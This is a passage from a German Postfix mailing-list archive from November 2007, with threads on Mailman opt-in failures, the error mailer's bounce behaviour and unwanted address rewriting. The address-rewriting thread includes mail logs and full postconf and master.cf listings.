2007 12:01:18 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_Sendet_nicht_erg=E4nzu?= =?iso-8859-1?q?g_nur_Opt_in_Mails_werden_nicht_versand?= In-Reply-To: <20071126105628.GA552@athlon.schoeppi.net> References: <20071125134431.GA5883@athlon.schoeppi.net> <20071126105628.GA552@athlon.schoeppi.net> Message-ID: <000901c8301b$acf24d30$e980a8c0@skanwood.local> -----Original Message----- From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] On Behalf Of Christian Schoepplein Sent: Monday, November 26, 2007 11:56 AM To: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. Subject: Re: [Postfixbuch-users]Mailman Sendet nicht ergänzug nur Opt in Mails werden nicht versand On So, Nov 25, 2007 at 05:38:51 +0100, Bernhard Schneider wrote: >ich habe den fehler schon soweit eigegrenzt das ich aussagen kann das >der Opt in in Mailmann nicht funktioniert wenn cih die Adressen >händisch eintrage funktioniert die kommun ikation ? Was heißt das genau? Mails die an listenname-subscribe at domain.tld gehen kommen nie bei mailman an und Mailadressen, die du händisch übers Webinterface einträgst, werden subscribed, also auch eine Bestätigungsnachricht verschickt? Wenn ich über das Webinterface Händisch eine e-mail adresse eintrage werden die Rückbetätigungs mail nicht versant und die emails nicht eingetragen wenn ich die adressen händisch überd die admin schnistelle nachtrage funktioniert die sache und die Opt in mail bei betsätigung werden nie an Postfix übergeben Versendet mailman nun Nachrichten oder nicht? Mailmann sendte die Anmeldebestätigungsmails nicht -- Christian Schoepplein From chris at schoeppi.net Mon Nov 26 12:23:04 2007 From: chris at schoeppi.net (Christian Schoepplein) Date: Mon, 26 Nov 2007 12:23:04 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_Sendet_nicht_erg=E4nzu?= =?iso-8859-1?q?g_nur_Opt_in_Mails_werden_nicht_versand?= In-Reply-To: <000901c8301b$acf24d30$e980a8c0@skanwood.local> References: <20071126105628.GA552@athlon.schoeppi.net> <000901c8301b$acf24d30$e980a8c0@skanwood.local> Message-ID: <20071126112304.GC552@athlon.schoeppi.net> On Mo, Nov 26, 2007 at 12:01:18 +0100, mail at b-schneider.de wrote: >>Versendet mailman nun Nachrichten oder nicht? > >Mailmann sendte die Anmeldebestätigungsmails nicht Und laufen jetzt die Prozesse, was bringt das ps aux Ohne diese Info und ohne Logs können wir dir nicht weiterhelfen. Schöpp -- Christian Schoepplein -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 189 bytes Beschreibung: Digital signature URL : From ast-postfix at treibsand.com Mon Nov 26 13:43:49 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Mon, 26 Nov 2007 13:43:49 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: <474A9E46.2050305@rbmail.ch> References: <000101c8300d$235e9b90$def3fea9@skanwood.local> <474A9E46.2050305@rbmail.ch> Message-ID: <3A6B640B-0C9A-4BD5-ADDD-1C6D2E84916F@treibsand.com> Hi, >> Python kann die Datei /var/lib/mailman/lists/ipsc-generell/ >> config.pck.last nicht lesen. >> Gehört die Datei dem Mailman Benutzer? Sie sollte dem Benutzer/Gruppe >> gehören, >> welche in mm_cfg.py unter MAILMAN_UID bzw. MAILMAN_GID eingetragen >> ist. >> > Müsste in diesem Fall die Meldung nicht Permission denied heissen? ja stimmt. Da hab ich mich verlesen, wenn die Rechte bzw. Eigentümer nicht stimmen, dann ist es Permission denied. Es scheint wohl doch der Zugriff direkt nicht erlaubt zu sein. SELinux? Erweiterte Dateisystem Attribute? Bye, Axel From mluser at rbmail.ch Mon Nov 26 13:51:30 2007 From: mluser at rbmail.ch (Andre Keller) Date: Mon, 26 Nov 2007 13:51:30 +0100 Subject: [Postfixbuch-users] Mailman Fehler Cron/usr/bin/python -S /usr/lib/mailman/cron/disabled In-Reply-To: <3A6B640B-0C9A-4BD5-ADDD-1C6D2E84916F@treibsand.com> References: <000101c8300d$235e9b90$def3fea9@skanwood.local> <474A9E46.2050305@rbmail.ch> <3A6B640B-0C9A-4BD5-ADDD-1C6D2E84916F@treibsand.com> Message-ID: <474AC152.6070101@rbmail.ch> > ja stimmt. Da hab ich mich verlesen, wenn die Rechte bzw. Eigentümer > nicht stimmen, dann ist es Permission denied. Es scheint wohl doch der > Zugriff direkt nicht erlaubt zu sein. SELinux? Erweiterte Dateisystem > Attribute? > War ja auch meine Vermutung... Jedoch hat der OP sich noch nicht wieder gemeldet... warten wir mal ab... From peter.bauernfeind at reba-eno.de Mon Nov 26 16:58:27 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Mon, 26 Nov 2007 16:58:27 +0100 Subject: [Postfixbuch-users] error mailer Message-ID: <474AED23.10609@reba-eno.de> Hallo, aus der Beschreibung zu transport habe ich folgenden Satz entnommen: The error mailer can be used to bounce mail: .example.com error:mail for *.example.com is not deliverable This causes all mail for user at anything.example.com to be bounced. Macht postfix hier einen Bounce oder einen Reject? Oder anders gefragt, beendet Postfix die Kommunitation mit einem 5xx Fehler oder wird eine Mail zum Absender veschickt? Mit freundlichem Gruß Peter Bauernfeind From ast-postfix at treibsand.com Mon Nov 26 17:20:53 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Mon, 26 Nov 2007 17:20:53 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <474AED23.10609@reba-eno.de> References: <474AED23.10609@reba-eno.de> Message-ID: <5134FEC4-B2CB-430B-A6B2-4B38681BF4DD@treibsand.com> Hi, > aus der Beschreibung zu transport habe ich folgenden Satz entnommen: > > The error mailer can be used to bounce mail: > .example.com error:mail for *.example.com is not > deliverable > This causes all mail for user at anything.example.com to be bounced. > > Macht postfix hier einen Bounce oder einen Reject? Oder anders > gefragt, > beendet Postfix die Kommunitation mit einem 5xx Fehler oder wird eine > Mail zum Absender veschickt? > beim rcpt to wird ein 550 Fehler zurueck geschickt. Die Verbindung wird aber nicht getrennt, es koennten ja noch gueltige Empfaenger kommen. Bye, Axel From peter.bauernfeind at reba-eno.de Mon Nov 26 17:35:00 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Mon, 26 Nov 2007 17:35:00 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <5134FEC4-B2CB-430B-A6B2-4B38681BF4DD@treibsand.com> References: <474AED23.10609@reba-eno.de> <5134FEC4-B2CB-430B-A6B2-4B38681BF4DD@treibsand.com> Message-ID: <474AF5B4.5010202@reba-eno.de> Axel Steiner schrieb: > Hi, > > >> aus der Beschreibung zu transport habe ich folgenden Satz entnommen: >> >> The error mailer can be used to bounce mail: >> .example.com error:mail for *.example.com is not >> deliverable >> This causes all mail for user at anything.example.com to be bounced. >> >> Macht postfix hier einen Bounce oder einen Reject? Oder anders >> gefragt, >> beendet Postfix die Kommunitation mit einem 5xx Fehler oder wird eine >> Mail zum Absender veschickt? >> >> > > > beim rcpt to wird ein 550 Fehler zurueck geschickt. Danke. > Die Verbindung wird > aber nicht getrennt, es koennten ja noch gueltige Empfaenger kommen. > Wie lange? Mit freundlichem Gruß Peter Bauernfeind From ast-postfix at treibsand.com Mon Nov 26 17:43:08 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Mon, 26 Nov 2007 17:43:08 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <474AF5B4.5010202@reba-eno.de> References: <474AED23.10609@reba-eno.de> <5134FEC4-B2CB-430B-A6B2-4B38681BF4DD@treibsand.com> <474AF5B4.5010202@reba-eno.de> Message-ID: <08844CA6-5C04-43C1-92B4-6FC52D5C711E@treibsand.com> Hi, >> beim rcpt to wird ein 550 Fehler zurueck geschickt. > Danke. >> Die Verbindung wird >> aber nicht getrennt, es koennten ja noch gueltige Empfaenger kommen. >> > Wie lange? der Default liegt bei 300 Sekunden (http://www.postfix.org/postconf. 5.html#smtpd_timeout). Bye, Axel From ml at awinkelmann.de Mon Nov 26 17:39:35 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 26 Nov 2007 17:39:35 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474AA2C3.7090105@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de> Message-ID: <200711261739.35515.ml@awinkelmann.de> On Montag, 26. November 2007, Sven Schmidt wrote: > Ich hab Mailman nach der Anleitung in /postfix-to-mailman.py installiert > und einen Transport eingerichtet. > > Leider wirft das Fehler raus: > mail for lists1.server.de loops back to myself > > Wo muss man da noch schrauben? In der Config. -- Andreas From ml at awinkelmann.de Mon Nov 26 18:08:05 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 26 Nov 2007 18:08:05 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <474AED23.10609@reba-eno.de> References: <474AED23.10609@reba-eno.de> Message-ID: <200711261808.05787.ml@awinkelmann.de> On Montag, 26. November 2007, Peter Bauernfeind wrote: > aus der Beschreibung zu transport habe ich folgenden Satz entnommen: > > The error mailer can be used to bounce mail: > .example.com error:mail for *.example.com is not > deliverable This causes all mail for user at anything.example.com to be > bounced. > > Macht postfix hier einen Bounce oder einen Reject? Oder anders gefragt, > beendet Postfix die Kommunitation mit einem 5xx Fehler oder wird eine > Mail zum Absender veschickt? Einen Bounce, wie es in der man-Page steht. Die transport_maps wird erst ausgewertet, wenn die Mail angenommen wurde - zu spät für einen reject. Dies ist eher für Mails, die über sendmail reinkommen, da findet keine so genaue Überprüfung statt wie am smtpd. Vielleicht solltest Du einfach sagen, was Du überhaupt willst. -- Andreas From p.heinlein at heinlein-support.de Mon Nov 26 18:38:42 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Mon, 26 Nov 2007 18:38:42 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474AA2C3.7090105@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de> Message-ID: <200711261838.43041.p.heinlein@heinlein-support.de> Am Montag, 26. November 2007 11:41 schrieb Sven Schmidt: > Ich hab Mailman nach der Anleitung in /postfix-to-mailman.py > installiert und einen Transport eingerichtet. > > Leider wirft das Fehler raus: > mail for lists1.server.de loops back to myself Postfixbuch, Seite 274. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030 / 40 50 51 - 0 *** Fax: - 19 Die 2. Secure Linux Administration Conference am 6./7.12.2007 http://www.heinlein-support.de/slac Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From driessen at fblan.de Mon Nov 26 20:12:21 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 26 Nov 2007 20:12:21 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um Message-ID: <003801c83060$45508e40$0565a8c0@uwe> Und ich finde nicht warum Gesendet wird die Mail an fblan-feilbingert-request at lists.fblan.de und postfix schreibt diese in fblan-feilbingert-request at fblan.de um Nov 26 19:25:49 s1 postfix/qmgr[8361]: 8FDCE82C2BF: from=, size=3080, nrcpt=1 (queue active) Nov 26 19:25:49 s1 amavis[29643]: (29643-06) Passed, -> , quarantine hgED4GhJux6n, Message-ID: <003501c83059$c39dcb20$0565a8c0 at uwe>, Hits: -1.44 Nov 26 19:25:49 s1 postfix/lmtp[8368]: 49FAF82C2B7: to=, orig_to=, relay=127.0.0.1[127.0.0.1]:10024, delay=0.41, delays=0.13/0.01/0/0.27, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 8FDCE82C2BF) Nov 26 19:25:49 s1 postfix/qmgr[8361]: 49FAF82C2B7: removed Nov 26 19:25:49 s1 postfix/smtpd[8371]: disconnect from localhost.localdomain[127.0.0.1] Nov 26 19:25:49 s1 postfix/virtual[8372]: 8FDCE82C2BF: to=, relay=virtual, delay=0.2, delays=0.09/0.01/0/0.09, dsn=5.1.1, status=bounced (unknown user: "fblan-feilbingert-request at fblan.de") Nov 26 19:25:49 s1 postfix/cleanup[8367]: C05D082C2DE: message-id=<20071126182549.C05D082C2DE at mail.fblan.de> Nov 26 19:25:49 s1 postfix/qmgr[8361]: C05D082C2DE: from=<>, size=5738, nrcpt=1 (queue active) Nov 26 19:25:49 s1 postfix/qmgr[8361]: 8FDCE82C2BF: removed Nov 26 19:25:49 s1 postfix/bounce[8373]: 8FDCE82C2BF: sender non-delivery notification: C05D082C2DE Nov 26 19:25:49 s1 postfix/virtual[8372]: C05D082C2DE: to=, relay=virtual, delay=0.16, delays=0.08/0/0/0.08, dsn=2.0.0, status=sent (delivered to maildir) Postconf -n address_verify_sender = alias_database = hash:/etc/postfix/aliases alias_maps = hash:/etc/postfix/aliases anvil_rate_time_unit = 5s anvil_status_update_time = 660m append_at_myorigin = yes append_dot_mydomain = no authorized_submit_users = !www-data, static:anyone biff = no bounce_queue_lifetime = 0 bounce_template_file = /etc/postfix/bounce.de-DE.cf broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix content_filter = smtp-amavis:[127.0.0.1]:10024 daemon_directory = /usr/lib/postfix default_destination_concurrency_limit = 10 default_destination_recipient_limit = 20 delay_warning_time = 1h disable_vrfy_command = yes hopcount_limit = 20 inet_interfaces = [193.158.37.130] [127.0.0.1] inet_protocols = all local_recipient_maps = unix:passwd.byname $alias_maps $alias_database local_transport = hash:/etc/postfix/transport, local:$myorigin mail_spool_directory = /var/spool/mail mailbox_command = procmail -a $EXTENSION mailbox_size_limit = 30000000 maximal_queue_lifetime = 4h message_size_limit = 15240000 myhostname = mail.fblan.de mynetworks = 193.158.37.130/32 127.0.0.0/8 mynetworks_style = host myorigin = fblan.de recipient_delimiter = + setgid_group = postdrop show_user_unknown_table_name = no smtp_host_lookup = dns,native smtp_line_length_limit = 990 smtp_tls_note_starttls_offer = yes smtp_use_tls = yes smtpd_banner = $myhostname ESMTP $mail_name smtpd_client_connection_rate_limit = 10 smtpd_client_event_limit_exceptions = $mynetworks, hash:/etc/postfix/aliases, unix:passwd.byname, hash:/etc/postfix/adress_maps/ausnahme smtpd_client_message_rate_limit = 30 smtpd_client_recipient_rate_limit = 30 smtpd_client_restrictions = smtpd_data_restrictions = reject_multi_recipient_bounce, reject_unauth_pipelining smtpd_delay_reject = no smtpd_discard_ehlo_keywords = hash:/etc/postfix/smtpd_discard_ehlo_keyword smtpd_error_sleep_time = 0s smtpd_hard_error_limit = 2 smtpd_helo_required = yes smtpd_helo_restrictions = smtpd_junk_command_limit = 20 smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/maps/ungueltige, permit_mynetworks, reject_unlisted_recipient, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, reject_sender_login_mismatch, reject_unlisted_sender, permit_sasl_authenticated, check_client_access pcre:/etc/postfix/maps/dynip, check_helo_access pcre:/etc/postfix/helo_checks, check_sender_mx_access cidr:/etc/postfix/maps/bogus_mx, check_sender_mx_access hash:/etc/postfix/maps/wildcard_mx, check_sender_access hash:/etc/postfix/maps/access, reject_invalid_helo_hostname, reject_non_fqdn_helo_hostname, reject_unauth_destination, reject_unknown_reverse_client_hostname, reject_unknown_client_hostname, check_client_access pcre:/etc/postfix/maps/dialups.grey, check_policy_service inet:127.0.0.1:12525, check_recipient_access hash:/etc/postfix/roleaccount, reject_rhsbl_sender dsn.rfc-ignorant.org smtpd_reject_unlisted_sender = yes smtpd_restriction_classes = greylisting smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = vhcs.net smtpd_sasl_security_options = noanonymous smtpd_sasl_type = cyrus smtpd_sender_login_maps = hash:/etc/postfix/vhcs2/aliases, hash:/etc/postfix/vhcs2/domains smtpd_sender_restrictions = smtpd_timeout = 60s smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/postfix/ssl/mail.cert smtpd_tls_key_file = /etc/postfix/ssl/mail.key smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes strict_rfc821_envelopes = yes syslog_facility = local4 tls_random_source = dev:/dev/urandom transport_maps = hash:/etc/postfix/vhcs2/transport, hash:/etc/postfix/transport unknown_address_reject_code = 550 unknown_client_reject_code = 550 unknown_hostname_reject_code = 550 unverified_recipient_reject_code = 550 unverified_sender_reject_code = 550 virtual_alias_maps = hash:/var/lib/mailman/data/virtual-mailman, hash:/etc/postfix/virt_ali, hash:/etc/postfix/vhcs2/aliases virtual_gid_maps = static:8 virtual_mailbox_base = /var/mail/virtual virtual_mailbox_domains = hash:/etc/postfix/vhcs2/domains virtual_mailbox_limit = 30000000 virtual_mailbox_maps = hash:/etc/postfix/vhcs2/mailboxes virtual_minimum_uid = 119 virtual_transport = virtual virtual_uid_maps = static:119 master.cf smtp inet n - - 0 20 smtpd -o header_checks=pcre:/etc/postfix/checks/header_smtp -o smtpd_proxy_filter=localhost:10024 -o smtp_data_done_timeout=300 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o smtpd_proxy_timeout=300s -o max_use=20 -o smtpd_client_connection_count_limit=10 submission inet n - - - - smtpd -o smtpd_sasl_auth_enable=yes -o smtpd_proxy_filter= -o smtpd_recipient_restrictions=$submission_smtpd_recipient_restrictions -o receive_override_option=no_header_body_checks mailman unix - n n - - pipe flags=FR user=list argv=/var/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${mailbox} pickup fifo n - - 60 1 pickup -o smtpd_proxy_filter= -o receive_override_option=no_header_body_checks cleanup unix n - - - 0 cleanup qmgr fifo n - - 300 1 qmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000? 0 flush proxymap unix - - n - - proxymap smtp unix - - - - - smtp relay unix - - - - - smtp showq unix n - - - - showq error unix - - - - - error local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - n - - lmtp anvil unix - - n - 1 anvil smtp-amavis unix - - - - 2 lmtp -o lmtp_data_done_timeout=1200 -o lmtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=10 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks,reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_end_of_data_restrictions= -o mynetworks=127.0.0.0/8 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks 127.0.0.1:11026 inet n - n - - smtpd -o smtpd_authorized_xforward_hosts=127.0.0.0/8 -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o smtpd_data_restrictions= -o mynetworks=127.0.0.0/8 -o receive_override_options=no_unknown_recipient_checks maildrop unix - n n - - pipe flags=DRhu user=vmail argv=/usr/local/bin/maildrop -d ${recipient} -w 75 maildrop_destination_recipient_limit = 1 uucp unix - n n - - pipe flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient) ifmail unix - n n - - pipe flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient) bsmtp unix - n n - - pipe flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -d -t$nexthop -f$sender $recipient scalemail-backend unix - n n - 2 pipe flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension} smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes vhcs2-arpl unix - n n - - pipe flags= user=vmail argv=/var/www/vhcs2/engine/messager/vhcs2-arpl-msgr tlsmgr unix - - - 1000? 1 tlsmgr scache unix - - - - 1 scache discard unix - - - - - discard retry unix - - n - - error wo kommt Postfix drauf die Adressen umzuschreiben bzw. wo ich bohren. Ich wüste auch nicht das ich irgendwo eine Umschreibung für Domains aktiv hätte. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Mon Nov 26 20:31:51 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 26 Nov 2007 20:31:51 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um In-Reply-To: <003801c83060$45508e40$0565a8c0@uwe> References: <003801c83060$45508e40$0565a8c0@uwe> Message-ID: <200711262031.51456.ml@awinkelmann.de> On Montag, 26. November 2007, Uwe Driessen wrote: > Und ich finde nicht warum > > Gesendet wird die Mail an fblan-feilbingert-request at lists.fblan.de und > postfix schreibt diese in fblan-feilbingert-request at fblan.de um > > Nov 26 19:25:49 s1 postfix/qmgr[8361]: 8FDCE82C2BF: from= fblan.de>, size=3080, nrcpt=1 (queue active) > Nov 26 19:25:49 s1 amavis[29643]: (29643-06) Passed, -> > , quarantine hgED4GhJux6n, Message-ID: > <003501c83059$c39dcb20$0565a8c0 at uwe>, Hits: -1.44 > Nov 26 19:25:49 s1 postfix/lmtp[8368]: 49FAF82C2B7: > to=, > orig_to=, > relay=127.0.0.1[127.0.0.1]:10024, delay=0.41, delays=0.13/0.01/0/0.27, > dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 8FDCE82C2BF) > Nov 26 19:25:49 s1 postfix/qmgr[8361]: 49FAF82C2B7: removed > Nov 26 19:25:49 s1 postfix/smtpd[8371]: disconnect from > localhost.localdomain[127.0.0.1] Nov 26 19:25:49 s1 postfix/virtual[8372]: > 8FDCE82C2BF: > to=, relay=virtual, delay=0.2, > delays=0.09/0.01/0/0.09, dsn=5.1.1, status=bounced (unknown user: > "fblan-feilbingert-request at fblan.de") > Nov 26 19:25:49 s1 postfix/cleanup[8367]: C05D082C2DE: > message-id=<20071126182549.C05D082C2DE at mail.fblan.de> > Nov 26 19:25:49 s1 postfix/qmgr[8361]: C05D082C2DE: from=<>, size=5738, > nrcpt=1 (queue active) > Nov 26 19:25:49 s1 postfix/qmgr[8361]: 8FDCE82C2BF: removed > Nov 26 19:25:49 s1 postfix/bounce[8373]: 8FDCE82C2BF: sender non-delivery > notification: C05D082C2DE > Nov 26 19:25:49 s1 postfix/virtual[8372]: C05D082C2DE: to= fblan.de>, relay=virtual, delay=0.16, delays=0.08/0/0/0.08, dsn=2.0.0, > status=sent (delivered to maildir) > > Postconf -n > > address_verify_sender = > alias_database = hash:/etc/postfix/aliases > alias_maps = hash:/etc/postfix/aliases > anvil_rate_time_unit = 5s > anvil_status_update_time = 660m > append_at_myorigin = yes > append_dot_mydomain = no > authorized_submit_users = !www-data, static:anyone > biff = no > bounce_queue_lifetime = 0 > bounce_template_file = /etc/postfix/bounce.de-DE.cf > broken_sasl_auth_clients = yes > command_directory = /usr/sbin > config_directory = /etc/postfix > content_filter = smtp-amavis:[127.0.0.1]:10024 _S_mtp-amavis ? > daemon_directory = /usr/lib/postfix > default_destination_concurrency_limit = 10 > default_destination_recipient_limit = 20 > delay_warning_time = 1h > disable_vrfy_command = yes > hopcount_limit = 20 > inet_interfaces = [193.158.37.130] [127.0.0.1] > inet_protocols = all > local_recipient_maps = unix:passwd.byname $alias_maps $alias_database > local_transport = hash:/etc/postfix/transport, local:$myorigin Sieht sehr merkwürdig aus. > mail_spool_directory = /var/spool/mail > mailbox_command = procmail -a $EXTENSION > mailbox_size_limit = 30000000 > maximal_queue_lifetime = 4h > message_size_limit = 15240000 > myhostname = mail.fblan.de > mynetworks = 193.158.37.130/32 127.0.0.0/8 > mynetworks_style = host > myorigin = fblan.de > recipient_delimiter = + > setgid_group = postdrop > show_user_unknown_table_name = no > smtp_host_lookup = dns,native > smtp_line_length_limit = 990 > smtp_tls_note_starttls_offer = yes > smtp_use_tls = yes > smtpd_banner = $myhostname ESMTP $mail_name > smtpd_client_connection_rate_limit = 10 > smtpd_client_event_limit_exceptions = $mynetworks, > hash:/etc/postfix/aliases, unix:passwd.byname, > hash:/etc/postfix/adress_maps/ausnahme > smtpd_client_message_rate_limit = 30 > smtpd_client_recipient_rate_limit = 30 > smtpd_client_restrictions = > smtpd_data_restrictions = reject_multi_recipient_bounce, > reject_unauth_pipelining > smtpd_delay_reject = no > smtpd_discard_ehlo_keywords = hash:/etc/postfix/smtpd_discard_ehlo_keyword > smtpd_error_sleep_time = 0s > smtpd_hard_error_limit = 2 > smtpd_helo_required = yes > smtpd_helo_restrictions = > smtpd_junk_command_limit = 20 > smtpd_recipient_restrictions = check_recipient_access > hash:/etc/postfix/maps/ungueltige, permit_mynetworks, > reject_unlisted_recipient, > reject_non_fqdn_sender, > reject_non_fqdn_recipient, > reject_unknown_sender_domain, > reject_unknown_recipient_domain, > reject_sender_login_mismatch, > reject_unlisted_sender, > permit_sasl_authenticated, > check_client_access pcre:/etc/postfix/maps/dynip, > check_helo_access pcre:/etc/postfix/helo_checks, > check_sender_mx_access cidr:/etc/postfix/maps/bogus_mx, > check_sender_mx_access hash:/etc/postfix/maps/wildcard_mx, > check_sender_access hash:/etc/postfix/maps/access, > reject_invalid_helo_hostname, reject_non_fqdn_helo_hostname, > reject_unauth_destination, reject_unknown_reverse_client_hostname, > reject_unknown_client_hostname, > check_client_access pcre:/etc/postfix/maps/dialups.grey, > check_policy_service inet:127.0.0.1:12525, > check_recipient_access hash:/etc/postfix/roleaccount, > reject_rhsbl_sender dsn.rfc-ignorant.org > smtpd_reject_unlisted_sender = yes > smtpd_restriction_classes = greylisting > smtpd_sasl_auth_enable = yes > smtpd_sasl_authenticated_header = yes > smtpd_sasl_local_domain = vhcs.net > smtpd_sasl_security_options = noanonymous > smtpd_sasl_type = cyrus > smtpd_sender_login_maps = hash:/etc/postfix/vhcs2/aliases, > hash:/etc/postfix/vhcs2/domains > smtpd_sender_restrictions = > smtpd_timeout = 60s > smtpd_tls_auth_only = no > smtpd_tls_cert_file = /etc/postfix/ssl/mail.cert > smtpd_tls_key_file = /etc/postfix/ssl/mail.key > smtpd_tls_loglevel = 1 > smtpd_tls_received_header = yes > smtpd_tls_session_cache_timeout = 3600s > smtpd_use_tls = yes > strict_rfc821_envelopes = yes > syslog_facility = local4 > tls_random_source = dev:/dev/urandom > transport_maps = hash:/etc/postfix/vhcs2/transport, > hash:/etc/postfix/transport unknown_address_reject_code = 550 > unknown_client_reject_code = 550 > unknown_hostname_reject_code = 550 > unverified_recipient_reject_code = 550 > unverified_sender_reject_code = 550 > virtual_alias_maps = hash:/var/lib/mailman/data/virtual-mailman, > hash:/etc/postfix/virt_ali, hash:/etc/postfix/vhcs2/aliases Die würde ich wegen der umschreib-Geschichte mal prüfen. > virtual_gid_maps = static:8 > virtual_mailbox_base = /var/mail/virtual > virtual_mailbox_domains = hash:/etc/postfix/vhcs2/domains > virtual_mailbox_limit = 30000000 > virtual_mailbox_maps = hash:/etc/postfix/vhcs2/mailboxes > virtual_minimum_uid = 119 > virtual_transport = virtual > virtual_uid_maps = static:119 > > master.cf > > smtp inet n - - 0 20 smtpd > -o header_checks=pcre:/etc/postfix/checks/header_smtp > -o smtpd_proxy_filter=localhost:10024 Ein proxy_filter hier ein content_filter in der main.cf. Ist das sowas wie ein Wettstreit? > -o smtp_data_done_timeout=300 > -o smtp_send_xforward_command=yes > -o disable_dns_lookups=yes > -o smtpd_proxy_timeout=300s > -o max_use=20 > -o smtpd_client_connection_count_limit=10 > > submission inet n - - - - smtpd > -o smtpd_sasl_auth_enable=yes > -o smtpd_proxy_filter= > -o > smtpd_recipient_restrictions=$submission_smtpd_recipient_restrictions -o > receive_override_option=no_header_body_checks > > mailman unix - n n - - pipe > flags=FR user=list argv=/var/lib/mailman/bin/postfix-to-mailman.py > ${nexthop} ${mailbox} > > pickup fifo n - - 60 1 pickup > -o smtpd_proxy_filter= > -o receive_override_option=no_header_body_checks > cleanup unix n - - - 0 cleanup > qmgr fifo n - - 300 1 qmgr > rewrite unix - - - - - trivial-rewrite > bounce unix - - - - 0 bounce > defer unix - - - - 0 bounce > trace unix - - - - 0 bounce > verify unix - - - - 1 verify > flush unix n - - 1000? 0 flush > proxymap unix - - n - - proxymap > smtp unix - - - - - smtp > relay unix - - - - - smtp > showq unix n - - - - showq > error unix - - - - - error > local unix - n n - - local > virtual unix - n n - - virtual > lmtp unix - - n - - lmtp > anvil unix - - n - 1 anvil > smtp-amavis unix - - - - 2 lmtp smtp_ auf lmtp ? Sehr verwirrend, > -o lmtp_data_done_timeout=1200 > -o lmtp_send_xforward_command=yes > -o disable_dns_lookups=yes > -o max_use=10 > > 127.0.0.1:10025 inet n - - - - smtpd > -o content_filter= > -o local_recipient_maps= > -o relay_recipient_maps= > -o smtpd_restriction_classes= > -o smtpd_delay_reject=no > -o smtpd_client_restrictions=permit_mynetworks,reject > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_end_of_data_restrictions= > -o mynetworks=127.0.0.0/8 > -o smtpd_error_sleep_time=0 > -o smtpd_soft_error_limit=1001 > -o smtpd_hard_error_limit=1000 > -o smtpd_client_connection_count_limit=0 > -o smtpd_client_connection_rate_limit=0 > -o > receive_override_options=no_header_body_checks,no_unknown_recipient_checks > > 127.0.0.1:11026 inet n - n - - smtpd > -o smtpd_authorized_xforward_hosts=127.0.0.0/8 > 